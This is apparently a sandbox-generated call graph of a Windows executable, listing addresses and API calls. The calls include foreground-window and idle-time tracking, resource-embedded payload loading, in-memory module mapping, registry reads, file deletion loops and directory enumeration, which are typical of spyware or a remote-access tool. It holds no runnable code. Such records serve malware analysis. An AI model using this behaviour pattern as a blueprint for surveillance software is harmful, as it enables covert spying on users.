415c3f 53874->53875 53957 402ea1 28 API calls 53875->53957 53877 415c4e 53878 402f10 28 API calls 53877->53878 53879 415c5a 53878->53879 53958 402ea1 28 API calls 53879->53958 53881 415c64 53882 404aa1 61 API calls 53881->53882 53883 415c73 53882->53883 53884 401fd8 11 API calls 53883->53884 53885 415c7c 53884->53885 53886 401fd8 11 API calls 53885->53886 53887 415c88 53886->53887 53888 401fd8 11 API calls 53887->53888 53889 415c94 53888->53889 53890 401fd8 11 API calls 53889->53890 53891 415ca0 53890->53891 53892 401fd8 11 API calls 53891->53892 53893 415cac 53892->53893 53894 401fd8 11 API calls 53893->53894 53895 415cb8 53894->53895 53959 401f09 53895->53959 53898 401fd8 11 API calls 53899 415cca 53898->53899 53900 401fd8 11 API calls 53899->53900 53901 415cd3 53900->53901 53902 401e65 22 API calls 53901->53902 53903 415cde 53902->53903 53962 43bb2c 53903->53962 53906 415d16 53907 401e65 22 API calls 53906->53907 53907->53850 53908 415cf0 53909 415d09 53908->53909 53910 415cfe 53908->53910 53967 404f51 53909->53967 53966 404ff4 82 API calls 53910->53966 53913 415d04 53913->53914 53914->53851 53982 4050e4 84 API calls 53915->53982 53983 40423a 53916->53983 53920 4020df 11 API calls 53919->53920 53921 41bebf 53920->53921 53924 41bf31 53921->53924 53927 4041a2 28 API calls 53921->53927 53932 401fe2 28 API calls 53921->53932 53936 401fd8 11 API calls 53921->53936 53940 41bf2f 53921->53940 53989 41cec5 53921->53989 53922 401fd8 11 API calls 53923 41bf61 53922->53923 53925 401fd8 11 API calls 53923->53925 53926 4041a2 28 API calls 53924->53926 53928 41bf69 53925->53928 53929 41bf3d 53926->53929 53927->53921 53930 401fd8 11 API calls 53928->53930 53931 401fe2 28 API calls 53929->53931 53933 415ba1 53930->53933 53934 41bf46 53931->53934 53932->53921 53933->53849 53933->53850 53933->53914 53935 401fd8 11 API calls 53934->53935 53937 41bf4e 53935->53937 53936->53921 53938 41cec5 28 API calls 53937->53938 53938->53940 53940->53922 54025 441ed1 53941->54025 53944 402093 28 API calls 53945 415bd2 53944->53945 53946 41bb77 GetLastInputInfo GetTickCount 53945->53946 53946->53859 54034 436f10 53947->54034 53952 41bdaf 53953 41bdbc 53952->53953 53954 4020b7 28 API calls 53953->53954 53955 415c05 53954->53955 53955->53868 53956->53873 53957->53877 53958->53881 53960 402252 11 API calls 53959->53960 53961 401f12 53960->53961 53961->53898 53963 43bb45 _strftime 53962->53963 54083 43ae83 53963->54083 53965 415ceb 53965->53906 53965->53908 53966->53913 53968 404f65 53967->53968 53969 404fea 53967->53969 53970 404f6e 53968->53970 53971 404fc0 CreateEventA CreateThread 53968->53971 53972 404f7d GetLocalTime 53968->53972 53969->53914 53970->53971 53971->53969 54154 405150 53971->54154 53973 41bc1f 28 API calls 53972->53973 53974 404f91 53973->53974 54153 4052fd 28 API calls 53974->54153 53982->53913 53984 404243 53983->53984 53985 4023ce 11 API calls 53984->53985 53986 40424e 53985->53986 53987 402569 28 API calls 53986->53987 53988 4041b5 53987->53988 53988->53843 53990 41ced2 53989->53990 53991 41cf31 53990->53991 53996 41cee2 53990->53996 53992 41cf4b 53991->53992 53993 41d071 28 API calls 53991->53993 54009 41d1d7 28 API calls 53992->54009 53993->53992 53995 41cf2d 53995->53921 53997 41cf1a 53996->53997 54000 41d071 53996->54000 54008 41d1d7 28 API calls 53997->54008 54002 41d079 54000->54002 54001 41d0ab 54001->53997 54002->54001 54003 41d0af 54002->54003 54006 41d093 54002->54006 54020 402725 22 API calls 54003->54020 54010 41d0e2 54006->54010 54008->53995 54009->53995 54011 41d0ec __EH_prolog 54010->54011 54021 402717 22 API calls 54011->54021 54013 41d0ff 54022 41d1ee 11 API calls 54013->54022 54015 41d125 54016 41d15d 54015->54016 54023 402730 11 API calls 54015->54023 54016->54001 54018 41d144 54024 402712 11 API calls std::_Deallocate 54018->54024 54021->54013 54022->54015 54023->54018 54024->54016 54026 441edd 54025->54026 54029 441ccd 54026->54029 54028 41bc43 54028->53944 54030 441ce4 54029->54030 54032 441d1b __cftof 54030->54032 54033 44062d 20 API calls _Atexit 54030->54033 54032->54028 54033->54032 54035 41bb46 GetForegroundWindow GetWindowTextW 54034->54035 54036 40417e 54035->54036 54037 404186 54036->54037 54042 402252 54037->54042 54039 404191 54046 4041bc 54039->54046 54043 40225c 54042->54043 54044 4022ac 54042->54044 54043->54044 54050 402779 11 API calls std::_Deallocate 54043->54050 54044->54039 54047 4041c8 54046->54047 54051 4041d9 54047->54051 54049 40419c 54049->53952 54050->54044 54052 4041e9 54051->54052 54053 404206 54052->54053 54054 4041ef 54052->54054 54068 4027e6 54053->54068 54058 404267 54054->54058 54057 404204 54057->54049 54059 402888 22 API calls 54058->54059 54060 40427b 54059->54060 54061 404290 54060->54061 54062 4042a5 54060->54062 54079 4042df 22 API calls 54061->54079 54063 4027e6 28 API calls 54062->54063 54067 4042a3 54063->54067 54065 404299 54080 402c48 22 API calls 54065->54080 54067->54057 54069 4027ef 54068->54069 54070 402851 54069->54070 54071 4027f9 54069->54071 54082 4028a4 22 API calls 54070->54082 54074 402802 54071->54074 54076 402815 54071->54076 54081 402aea 28 API calls __EH_prolog 54074->54081 54077 402813 54076->54077 54078 402252 11 API calls 54076->54078 54077->54057 54078->54077 54079->54065 54080->54067 54081->54077 54099 43ba8a 54083->54099 54085 43aed0 54105 43a837 54085->54105 54086 43ae95 54086->54085 54087 43aeaa 54086->54087 54098 43aeaf __cftof 54086->54098 54104 44062d 20 API calls _Atexit 54087->54104 54091 43aedc 54092 43af0b 54091->54092 54113 43bacf 40 API calls __Toupper 54091->54113 54095 43af77 54092->54095 54114 43ba36 20 API calls 2 library calls 54092->54114 54115 43ba36 20 API calls 2 library calls 54095->54115 54096 43b03e _strftime 54096->54098 54116 44062d 20 API calls _Atexit 54096->54116 54098->53965 54100 43baa2 54099->54100 54101 43ba8f 54099->54101 54100->54086 54117 44062d 20 API calls _Atexit 54101->54117 54103 43ba94 __cftof 54103->54086 54104->54098 54106 43a854 54105->54106 54108 43a84a 54105->54108 54106->54108 54118 448295 GetLastError 54106->54118 54108->54091 54109 43a875 54139 4483e4 36 API calls __Getctype 54109->54139 54111 43a88e 54140 448411 36 API calls __cftof 54111->54140 54113->54091 54114->54095 54115->54096 54116->54098 54117->54103 54119 4482b7 54118->54119 54120 4482ab 54118->54120 54142 445b74 20 API calls 3 library calls 54119->54142 54141 44883c 11 API calls 2 library calls 54120->54141 54123 4482b1 54123->54119 54125 448300 SetLastError 54123->54125 54124 4482c3 54126 4482cb 54124->54126 54149 448892 11 API calls 2 library calls 54124->54149 54125->54109 54143 446802 54126->54143 54128 4482e0 54128->54126 54130 4482e7 54128->54130 54150 448107 20 API calls __Getctype 54130->54150 54131 4482d1 54133 44830c SetLastError 54131->54133 54151 446175 36 API calls 4 library calls 54133->54151 54134 4482f2 54136 446802 _free 20 API calls 54134->54136 54138 4482f9 54136->54138 54137 448318 54138->54125 54138->54133 54139->54111 54140->54108 54141->54123 54142->54124 54144 44680d HeapFree 54143->54144 54145 446836 __dosmaperr 54143->54145 54144->54145 54146 446822 54144->54146 54145->54131 54152 44062d 20 API calls _Atexit 54146->54152 54148 446828 GetLastError 54148->54145 54149->54128 54150->54134 54151->54137 54152->54148 54157 40515c 102 API calls 54154->54157 54156 405159 54157->54156 54158->53822 54159->53827 54160->53829 54161 44839e 54169 448790 54161->54169 54165 4483ba 54166 4483c7 54165->54166 54177 4483ca 11 API calls 54165->54177 54168 4483b2 54170 44854a __Getctype 5 API calls 54169->54170 54171 4487b7 54170->54171 54172 4487cf TlsAlloc 54171->54172 54173 4487c0 54171->54173 54172->54173 54174 43502b __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 54173->54174 54175 4483a8 54174->54175 54175->54168 54176 448319 20 API calls 2 library calls 54175->54176 54176->54165 54177->54168 54178 100020db 54181 100020e7 ___DestructExceptionObject 54178->54181 54179 100020f6 54180 10002110 dllmain_raw 54180->54179 54182 1000212a 54180->54182 54181->54179 54181->54180 54186 1000210b 54181->54186 54191 10001eec 54182->54191 54184 10002177 54184->54179 54185 10001eec 29 API calls 54184->54185 54187 1000218a 54185->54187 54186->54179 54186->54184 54188 10001eec 29 API calls 54186->54188 54187->54179 54189 10002193 dllmain_raw 54187->54189 54190 1000216d dllmain_raw 54188->54190 54189->54179 54190->54184 54192 10001ef7 54191->54192 54193 10001f2a dllmain_crt_process_detach 54191->54193 54194 10001f1c dllmain_crt_process_attach 54192->54194 54195 10001efc 54192->54195 54200 10001f06 54193->54200 54194->54200 54196 10001f01 54195->54196 54197 10001f12 54195->54197 54196->54200 54201 1000240b 25 API calls 54196->54201 54202 100023ec 27 API calls 54197->54202 54200->54186 54201->54200 54202->54200 54203 434918 54204 434924 ___DestructExceptionObject 54203->54204 54230 434627 54204->54230 54206 43492b 54208 434954 54206->54208 54536 434a8a IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 54206->54536 54217 434993 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 54208->54217 54241 4442d2 54208->54241 54212 434973 ___DestructExceptionObject 54213 4349f3 54249 434ba5 54213->54249 54217->54213 54537 443487 36 API calls 6 library calls 54217->54537 54231 434630 54230->54231 54542 434cb6 IsProcessorFeaturePresent 54231->54542 54233 43463c 54543 438fb1 54233->54543 54235 434641 54236 434645 54235->54236 54552 44415f 54235->54552 54236->54206 54239 43465c 54239->54206 54242 4442e9 54241->54242 54243 43502b __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 54242->54243 54244 43496d 54243->54244 54244->54212 54245 444276 54244->54245 54246 4442a5 54245->54246 54247 43502b __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 54246->54247 54248 4442ce 54247->54248 54248->54217 54250 436f10 ___scrt_fastfail 54249->54250 54251 434bb8 GetStartupInfoW 54250->54251 54252 4349f9 54251->54252 54253 444223 54252->54253 54602 44f0d9 54253->54602 54255 44422c 54257 434a02 54255->54257 54606 446895 36 API calls 54255->54606 54258 40ea00 54257->54258 54736 41cbe1 LoadLibraryA GetProcAddress 54258->54736 54260 40ea1c GetModuleFileNameW 54741 40f3fe 54260->54741 54262 40ea38 54263 4020f6 28 API calls 54262->54263 54264 40ea47 54263->54264 54265 4020f6 28 API calls 54264->54265 54266 40ea56 54265->54266 54267 41beac 28 API calls 54266->54267 54268 40ea5f 54267->54268 54756 40fb52 54268->54756 54270 40ea68 54271 401e8d 11 API calls 54270->54271 54272 40ea71 54271->54272 54273 40ea84 54272->54273 54274 40eace 54272->54274 54950 40fbee 118 API calls 54273->54950 54275 401e65 22 API calls 54274->54275 54277 40eade 54275->54277 54281 401e65 22 API calls 54277->54281 54278 40ea96 54279 401e65 22 API calls 54278->54279 54280 40eaa2 54279->54280 54951 410f72 36 API calls __EH_prolog 54280->54951 54282 40eafd 54281->54282 54283 40531e 28 API calls 54282->54283 54285 40eb0c 54283->54285 54287 406383 28 API calls 54285->54287 54286 40eab4 54952 40fb9f 78 API calls 54286->54952 54289 40eb18 54287->54289 54291 401fe2 28 API calls 54289->54291 54290 40eabd 54953 40f3eb 71 API calls 54290->54953 54293 40eb24 54291->54293 54294 401fd8 11 API calls 54293->54294 54295 40eb2d 54294->54295 54297 401fd8 11 API calls 54295->54297 54299 40eb36 54297->54299 54300 401e65 22 API calls 54299->54300 54301 40eb3f 54300->54301 54302 401fc0 28 API calls 54301->54302 54303 40eb4a 54302->54303 54304 401e65 22 API calls 54303->54304 54305 40eb63 54304->54305 54306 401e65 22 API calls 54305->54306 54307 40eb7e 54306->54307 54308 40ebe9 54307->54308 54954 406c59 54307->54954 54309 401e65 22 API calls 54308->54309 54314 40ebf6 54309->54314 54311 40ebab 54312 401fe2 28 API calls 54311->54312 54313 40ebb7 54312->54313 54316 401fd8 11 API calls 54313->54316 54315 40ec3d 54314->54315 54321 413584 3 API calls 54314->54321 54760 40d0a4 54315->54760 54318 40ebc0 54316->54318 54959 413584 RegOpenKeyExA 54318->54959 54327 40ec21 54321->54327 54325 40f38a 55052 4139e4 30 API calls 54325->55052 54327->54315 54962 4139e4 30 API calls 54327->54962 54335 40f3a0 55053 4124b0 65 API calls ___scrt_fastfail 54335->55053 54536->54206 54537->54213 54542->54233 54544 438fb6 ___vcrt_initialize_pure_virtual_call_handler ___vcrt_initialize_winapi_thunks 54543->54544 54556 43a4ba 54544->54556 54548 438fcc 54549 438fd7 54548->54549 54570 43a4f6 DeleteCriticalSection 54548->54570 54549->54235 54551 438fc4 54551->54235 54598 44fbe8 54552->54598 54555 438fda 8 API calls 3 library calls 54555->54236 54557 43a4c3 54556->54557 54559 43a4ec 54557->54559 54560 438fc0 54557->54560 54571 438eff 54557->54571 54576 43a4f6 DeleteCriticalSection 54559->54576 54560->54551 54562 43a46c 54560->54562 54591 438e14 54562->54591 54564 43a481 54564->54548 54565 43a476 54565->54564 54596 438ec2 6 API calls try_get_function 54565->54596 54567 43a48f 54568 43a49c 54567->54568 54597 43a49f 6 API calls ___vcrt_FlsFree 54567->54597 54568->54548 54570->54551 54577 438cf3 54571->54577 54574 438f22 54574->54557 54575 438f36 InitializeCriticalSectionAndSpinCount 54575->54574 54576->54560 54578 438d23 54577->54578 54579 438d27 54577->54579 54578->54579 54580 438d47 54578->54580 54584 438d93 54578->54584 54579->54574 54579->54575 54580->54579 54582 438d53 GetProcAddress 54580->54582 54583 438d63 __crt_fast_encode_pointer 54582->54583 54583->54579 54585 438dbb LoadLibraryExW 54584->54585 54586 438db0 54584->54586 54587 438dd7 GetLastError 54585->54587 54588 438def 54585->54588 54586->54578 54587->54588 54589 438de2 LoadLibraryExW 54587->54589 54588->54586 54590 438e06 FreeLibrary 54588->54590 54589->54588 54590->54586 54592 438cf3 try_get_function 5 API calls 54591->54592 54593 438e2e 54592->54593 54594 438e37 54593->54594 54595 438e46 TlsAlloc 54593->54595 54594->54565 54596->54567 54597->54564 54601 44fc01 54598->54601 54599 43502b __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 54600 43464e 54599->54600 54600->54239 54600->54555 54601->54599 54603 44f0eb 54602->54603 54604 44f0e2 54602->54604 54603->54255 54607 44efd8 54604->54607 54606->54255 54608 448295 __Getctype 36 API calls 54607->54608 54609 44efe5 54608->54609 54627 44f0f7 54609->54627 54611 44efed 54636 44ed6c 54611->54636 54614 44f004 54614->54603 54617 44f047 54620 446802 _free 20 API calls 54617->54620 54620->54614 54621 44f042 54660 44062d 20 API calls _Atexit 54621->54660 54623 44f08b 54623->54617 54661 44ec42 20 API calls 54623->54661 54624 44f05f 54624->54623 54625 446802 _free 20 API calls 54624->54625 54625->54623 54628 44f103 ___DestructExceptionObject 54627->54628 54629 448295 __Getctype 36 API calls 54628->54629 54634 44f10d 54629->54634 54631 44f191 ___DestructExceptionObject 54631->54611 54634->54631 54635 446802 _free 20 API calls 54634->54635 54662 446175 36 API calls 4 library calls 54634->54662 54663 445909 EnterCriticalSection 54634->54663 54664 44f188 LeaveCriticalSection std::_Lockit::~_Lockit 54634->54664 54635->54634 54637 43a837 __cftof 36 API calls 54636->54637 54638 44ed7e 54637->54638 54639 44ed8d GetOEMCP 54638->54639 54640 44ed9f 54638->54640 54642 44edb6 54639->54642 54641 44eda4 GetACP 54640->54641 54640->54642 54641->54642 54642->54614 54643 4461b8 54642->54643 54644 4461f6 54643->54644 54645 4461c6 __Getctype 54643->54645 54666 44062d 20 API calls _Atexit 54644->54666 54645->54644 54646 4461e1 RtlAllocateHeap 54645->54646 54665 443001 7 API calls 2 library calls 54645->54665 54646->54645 54648 4461f4 54646->54648 54648->54617 54650 44f199 54648->54650 54651 44ed6c 38 API calls 54650->54651 54652 44f1b8 54651->54652 54654 44f209 IsValidCodePage 54652->54654 54657 44f1bf 54652->54657 54658 44f22e ___scrt_fastfail 54652->54658 54653 43502b __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 54655 44f03a 54653->54655 54656 44f21b GetCPInfo 54654->54656 54654->54657 54655->54621 54655->54624 54656->54657 54656->54658 54657->54653 54667 44ee44 GetCPInfo 54658->54667 54660->54617 54661->54617 54662->54634 54663->54634 54664->54634 54665->54645 54666->54648 54668 44ef28 54667->54668 54673 44ee7e 54667->54673 54670 43502b __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 54668->54670 54672 44efd4 54670->54672 54672->54657 54677 4511ac 54673->54677 54676 44aee6 _swprintf 41 API calls 54676->54668 54678 43a837 __cftof 36 API calls 54677->54678 54679 4511cc MultiByteToWideChar 54678->54679 54681 4512a2 54679->54681 54682 45120a 54679->54682 54683 43502b __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 54681->54683 54684 45122b __alloca_probe_16 ___scrt_fastfail 54682->54684 54685 4461b8 ___crtLCMapStringA 21 API calls 54682->54685 54686 44eedf 54683->54686 54687 45129c 54684->54687 54689 451270 MultiByteToWideChar 54684->54689 54685->54684 54691 44aee6 54686->54691 54696 435ecd 20 API calls _free 54687->54696 54689->54687 54690 45128c GetStringTypeW 54689->54690 54690->54687 54692 43a837 __cftof 36 API calls 54691->54692 54693 44aef9 54692->54693 54697 44acc9 54693->54697 54696->54681 54698 44ace4 ___crtLCMapStringA 54697->54698 54699 44ad0a MultiByteToWideChar 54698->54699 54700 44ad34 54699->54700 54701 44aebe 54699->54701 54704 4461b8 ___crtLCMapStringA 21 API calls 54700->54704 54707 44ad55 __alloca_probe_16 54700->54707 54702 43502b __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 54701->54702 54703 44aed1 54702->54703 54703->54676 54704->54707 54705 44ae0a 54733 435ecd 20 API calls _free 54705->54733 54706 44ad9e MultiByteToWideChar 54706->54705 54708 44adb7 54706->54708 54707->54705 54707->54706 54724 448c33 54708->54724 54712 44ade1 54712->54705 54716 448c33 _strftime 11 API calls 54712->54716 54713 44ae19 54714 4461b8 ___crtLCMapStringA 21 API calls 54713->54714 54719 44ae3a __alloca_probe_16 54713->54719 54714->54719 54715 44aeaf 54732 435ecd 20 API calls _free 54715->54732 54716->54705 54717 448c33 _strftime 11 API calls 54720 44ae8e 54717->54720 54719->54715 54719->54717 54720->54715 54721 44ae9d WideCharToMultiByte 54720->54721 54721->54715 54722 44aedd 54721->54722 54734 435ecd 20 API calls _free 54722->54734 54725 44854a __Getctype 5 API calls 54724->54725 54726 448c5a 54725->54726 54729 448c63 54726->54729 54735 448cbb 10 API calls 3 library calls 54726->54735 54728 448ca3 LCMapStringW 54728->54729 54730 43502b __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 54729->54730 54731 448cb5 54730->54731 54731->54705 54731->54712 54731->54713 54732->54705 54733->54701 54734->54705 54735->54728 54737 41cc20 LoadLibraryA GetProcAddress 54736->54737 54738 41cc10 GetModuleHandleA GetProcAddress 54736->54738 54739 41cc49 44 API calls 54737->54739 54740 41cc39 LoadLibraryA GetProcAddress 54737->54740 54738->54737 54739->54260 54740->54739 55054 41b539 FindResourceA 54741->55054 54744 43bda0 _Yarn 21 API calls 54745 40f428 ctype 54744->54745 54746 4020b7 28 API calls 54745->54746 54747 40f443 54746->54747 54748 401fe2 28 API calls 54747->54748 54749 40f44e 54748->54749 54750 401fd8 11 API calls 54749->54750 54751 40f457 54750->54751 54752 43bda0 _Yarn 21 API calls 54751->54752 54753 40f468 ctype 54752->54753 55057 406e13 54753->55057 54755 40f49b 54755->54262 54757 40fb5e 54756->54757 54759 40fb65 54756->54759 55060 402163 11 API calls 54757->55060 54759->54270 55061 401fab 54760->55061 54950->54278 54951->54286 54952->54290 54955 4020df 11 API calls 54954->54955 54956 406c65 54955->54956 54957 4032a0 28 API calls 54956->54957 54958 406c82 54957->54958 54958->54311 54960 40ebdf 54959->54960 54961 4135ae RegQueryValueExA RegCloseKey 54959->54961 54960->54308 54960->54325 54961->54960 54962->54315 55052->54335 55055 41b556 LoadResource LockResource SizeofResource 55054->55055 55056 40f419 55054->55056 55055->55056 55056->54744 55058 4020b7 28 API calls 55057->55058 55059 406e27 55058->55059 55059->54755 55060->54759 55420 4129da 55421 4129ec 55420->55421 55422 4041a2 28 API calls 55421->55422 55423 4129ff 55422->55423 55424 4020f6 28 API calls 55423->55424 55425 412a0e 55424->55425 55426 4020f6 28 API calls 55425->55426 55427 412a1d 55426->55427 55428 41beac 28 API calls 55427->55428 55429 412a26 55428->55429 55430 412ace 55429->55430 55431 401e65 22 API calls 55429->55431 55432 401e8d 11 API calls 55430->55432 55433 412a3d 55431->55433 55434 412ad7 55432->55434 55436 4020f6 28 API calls 55433->55436 55435 401fd8 11 API calls 55434->55435 55437 412ae0 55435->55437 55438 412a48 55436->55438 55439 401fd8 11 API calls 55437->55439 55440 401e65 22 API calls 55438->55440 55441 412ae8 55439->55441 55442 412a53 55440->55442 55443 4020f6 28 API calls 55442->55443 55444 412a5e 55443->55444 55445 401e65 22 API calls 55444->55445 55446 412a69 55445->55446 55447 4020f6 28 API calls 55446->55447 55448 412a74 55447->55448 55449 401e65 22 API calls 55448->55449 55450 412a7f 55449->55450 55451 4020f6 28 API calls 55450->55451 55452 412a8a 55451->55452 55453 401e65 22 API calls 55452->55453 55454 412a95 55453->55454 55455 4020f6 28 API calls 55454->55455 55456 412aa0 55455->55456 55457 401e65 22 API calls 55456->55457 55458 412aae 55457->55458 55459 4020f6 28 API calls 55458->55459 55460 412ab9 55459->55460 55464 412aef GetModuleFileNameW 55460->55464 55463 404e26 99 API calls 55463->55430 55465 4020df 11 API calls 55464->55465 55466 412b1a 55465->55466 55467 4020df 11 API calls 55466->55467 55468 412b26 55467->55468 55469 4020df 11 API calls 55468->55469 55491 412b32 55469->55491 55470 401fd8 11 API calls 55470->55491 55471 41ba09 43 API calls 55471->55491 55472 40da23 32 API calls 55472->55491 55473 40417e 28 API calls 55473->55491 55474 412c58 Sleep 55474->55491 55475 4042fc 84 API calls 55475->55491 55476 40431d 28 API calls 55476->55491 55477 403014 28 API calls 55477->55491 55478 401f09 11 API calls 55478->55491 55479 412cfa Sleep 55479->55491 55480 4185a3 31 API calls 55480->55491 55481 412d9c Sleep 55481->55491 55482 41c516 32 API calls 55482->55491 55483 412dff DeleteFileW 55483->55491 55484 412e36 DeleteFileW 55484->55491 55485 412e88 Sleep 55485->55491 55486 412e72 DeleteFileW 55486->55491 55487 412f01 55488 401f09 11 API calls 55487->55488 55489 412f0d 55488->55489 55490 401f09 11 API calls 55489->55490 55492 412f19 55490->55492 55491->55470 55491->55471 55491->55472 55491->55473 55491->55474 55491->55475 55491->55476 55491->55477 55491->55478 55491->55479 55491->55480 55491->55481 55491->55482 55491->55483 55491->55484 55491->55485 55491->55487 55495 412ecd Sleep 55491->55495 55502 412e61 55491->55502 55493 401f09 11 API calls 55492->55493 55494 412f25 55493->55494 55496 40b93f 28 API calls 55494->55496 55497 401f09 11 API calls 55495->55497 55498 412f38 55496->55498 55497->55502 55500 4020f6 28 API calls 55498->55500 55499 401f09 11 API calls 55499->55502 55501 412f58 55500->55501 55611 413268 55501->55611 55502->55486 55502->55491 55502->55499 55504 412eff 55502->55504 55504->55494 55506 401f09 11 API calls 55507 412f6f 55506->55507 55508 4130e3 55507->55508 55509 412f8f 55507->55509 55510 41bdaf 28 API calls 55508->55510 55511 41bdaf 28 API calls 55509->55511 55512 4130ec 55510->55512 55513 412f9b 55511->55513 55514 402f31 28 API calls 55512->55514 55515 41bc1f 28 API calls 55513->55515 55516 413123 55514->55516 55517 412fb5 55515->55517 55518 402f10 28 API calls 55516->55518 55519 402f31 28 API calls 55517->55519 55520 413132 55518->55520 55521 412fe5 55519->55521 55522 402f10 28 API calls 55520->55522 55523 402f10 28 API calls 55521->55523 55524 41313e 55522->55524 55525 412ff4 55523->55525 55526 402f10 28 API calls 55524->55526 55527 402f10 28 API calls 55525->55527 55528 41314d 55526->55528 55529 413003 55527->55529 55530 402f10 28 API calls 55528->55530 55531 402f10 28 API calls 55529->55531 55532 41315c 55530->55532 55533 413012 55531->55533 55534 402f10 28 API calls 55532->55534 55535 402f10 28 API calls 55533->55535 55536 41316b 55534->55536 55537 413021 55535->55537 55538 402f10 28 API calls 55536->55538 55539 402f10 28 API calls 55537->55539 55541 41317a 55538->55541 55540 41302d 55539->55540 55543 402f10 28 API calls 55540->55543 55625 402ea1 28 API calls 55541->55625 55545 413039 55543->55545 55544 413184 55546 404aa1 61 API calls 55544->55546 55623 402ea1 28 API calls 55545->55623 55548 413191 55546->55548 55550 401fd8 11 API calls 55548->55550 55549 413048 55551 402f10 28 API calls 55549->55551 55552 41319d 55550->55552 55553 413054 55551->55553 55554 401fd8 11 API calls 55552->55554 55624 402ea1 28 API calls 55553->55624 55556 4131a9 55554->55556 55558 401fd8 11 API calls 55556->55558 55557 41305e 55559 404aa1 61 API calls 55557->55559 55560 4131b5 55558->55560 55561 41306b 55559->55561 55562 401fd8 11 API calls 55560->55562 55563 401fd8 11 API calls 55561->55563 55564 4131c1 55562->55564 55565 413074 55563->55565 55566 401fd8 11 API calls 55564->55566 55567 401fd8 11 API calls 55565->55567 55568 4131ca 55566->55568 55569 41307d 55567->55569 55570 401fd8 11 API calls 55568->55570 55571 401fd8 11 API calls 55569->55571 55573 4131d3 55570->55573 55572 413086 55571->55572 55575 401fd8 11 API calls 55572->55575 55574 401fd8 11 API calls 55573->55574 55576 4130d7 55574->55576 55577 41308f 55575->55577 55579 401fd8 11 API calls 55576->55579 55578 401fd8 11 API calls 55577->55578 55580 41309b 55578->55580 55581 4131e5 55579->55581 55582 401fd8 11 API calls 55580->55582 55583 401f09 11 API calls 55581->55583 55584 4130a7 55582->55584 55585 4131f1 55583->55585 55586 401fd8 11 API calls 55584->55586 55587 401fd8 11 API calls 55585->55587 55588 4130b3 55586->55588 55589 4131fd 55587->55589 55590 401fd8 11 API calls 55588->55590 55591 401fd8 11 API calls 55589->55591 55592 4130bf 55590->55592 55593 413209 55591->55593 55594 401fd8 11 API calls 55592->55594 55595 401fd8 11 API calls 55593->55595 55596 4130cb 55594->55596 55597 413215 55595->55597 55598 401fd8 11 API calls 55596->55598 55599 401fd8 11 API calls 55597->55599 55598->55576 55600 413221 55599->55600 55601 401fd8 11 API calls 55600->55601 55602 41322d 55601->55602 55603 401fd8 11 API calls 55602->55603 55604 413239 55603->55604 55605 401fd8 11 API calls 55604->55605 55606 413245 55605->55606 55607 401fd8 11 API calls 55606->55607 55608 413251 55607->55608 55609 401fd8 11 API calls 55608->55609 55610 412abe 55609->55610 55610->55463 55612 4132a6 55611->55612 55614 413277 55611->55614 55613 4132b5 55612->55613 55626 10001c5b 55612->55626 55615 40417e 28 API calls 55613->55615 55630 411d2d 55614->55630 55617 4132c1 55615->55617 55619 401fd8 11 API calls 55617->55619 55620 412f63 55619->55620 55620->55506 55623->55549 55624->55557 55625->55544 55627 10001c6b ___scrt_fastfail 55626->55627 55634 100012ee 55627->55634 55629 10001c87 55629->55613 55676 411d39 55630->55676 55633 411fa2 22 API calls _Yarn 55633->55612 55635 10001324 ___scrt_fastfail 55634->55635 55636 100013b7 GetEnvironmentVariableW 55635->55636 55660 100010f1 55636->55660 55639 100010f1 51 API calls 55640 10001465 55639->55640 55641 100010f1 51 API calls 55640->55641 55642 10001479 55641->55642 55643 100010f1 51 API calls 55642->55643 55644 1000148d 55643->55644 55645 100010f1 51 API calls 55644->55645 55646 100014a1 55645->55646 55647 100010f1 51 API calls 55646->55647 55648 100014b5 lstrlenW 55647->55648 55649 100014d2 55648->55649 55650 100014d9 lstrlenW 55648->55650 55649->55629 55651 100010f1 51 API calls 55650->55651 55652 10001501 lstrlenW lstrcatW 55651->55652 55653 100010f1 51 API calls 55652->55653 55654 10001539 lstrlenW lstrcatW 55653->55654 55655 100010f1 51 API calls 55654->55655 55656 1000156b lstrlenW lstrcatW 55655->55656 55657 100010f1 51 API calls 55656->55657 55658 1000159d lstrlenW lstrcatW 55657->55658 55659 100010f1 51 API calls 55658->55659 55659->55649 55661 10001118 ___scrt_fastfail 55660->55661 55662 10001129 lstrlenW 55661->55662 55673 10002c40 55662->55673 55664 10001148 lstrcatW lstrlenW 55665 10001177 lstrlenW FindFirstFileW 55664->55665 55666 10001168 lstrlenW 55664->55666 55667 100011a0 55665->55667 55668 100011e1 55665->55668 55666->55665 55669 100011c7 FindNextFileW 55667->55669 55670 100011aa 55667->55670 55668->55639 55669->55667 55672 100011da FindClose 55669->55672 55670->55669 55675 10001000 51 API calls ___scrt_fastfail 55670->55675 55672->55668 55674 10002c57 55673->55674 55674->55664 55674->55674 55675->55670 55711 4117d7 55676->55711 55678 411d57 55679 411d6d SetLastError 55678->55679 55680 4117d7 SetLastError 55678->55680 55707 411d35 55678->55707 55679->55707 55681 411d8a 55680->55681 55681->55679 55684 411dac GetNativeSystemInfo 55681->55684 55681->55707 55683 411df2 55695 411dff SetLastError 55683->55695 55714 411cde VirtualAlloc 55683->55714 55684->55683 55687 411e22 55688 411e47 GetProcessHeap HeapAlloc 55687->55688 55740 411cde VirtualAlloc 55687->55740 55689 411e70 55688->55689 55690 411e5e 55688->55690 55694 4117d7 SetLastError 55689->55694 55741 411cf5 VirtualFree 55690->55741 55692 411e3a 55692->55688 55692->55695 55696 411eb9 55694->55696 55695->55707 55697 411f6b 55696->55697 55715 411cde VirtualAlloc 55696->55715 55742 4120b2 GetProcessHeap HeapFree 55697->55742 55700 411ed2 ctype 55716 4117ea 55700->55716 55702 411efe 55702->55697 55720 411b9a 55702->55720 55706 411f36 55706->55697 55706->55707 55736 1000220c 55706->55736 55707->55633 55708 411f5c 55708->55707 55709 411f60 SetLastError 55708->55709 55709->55697 55712 4117e6 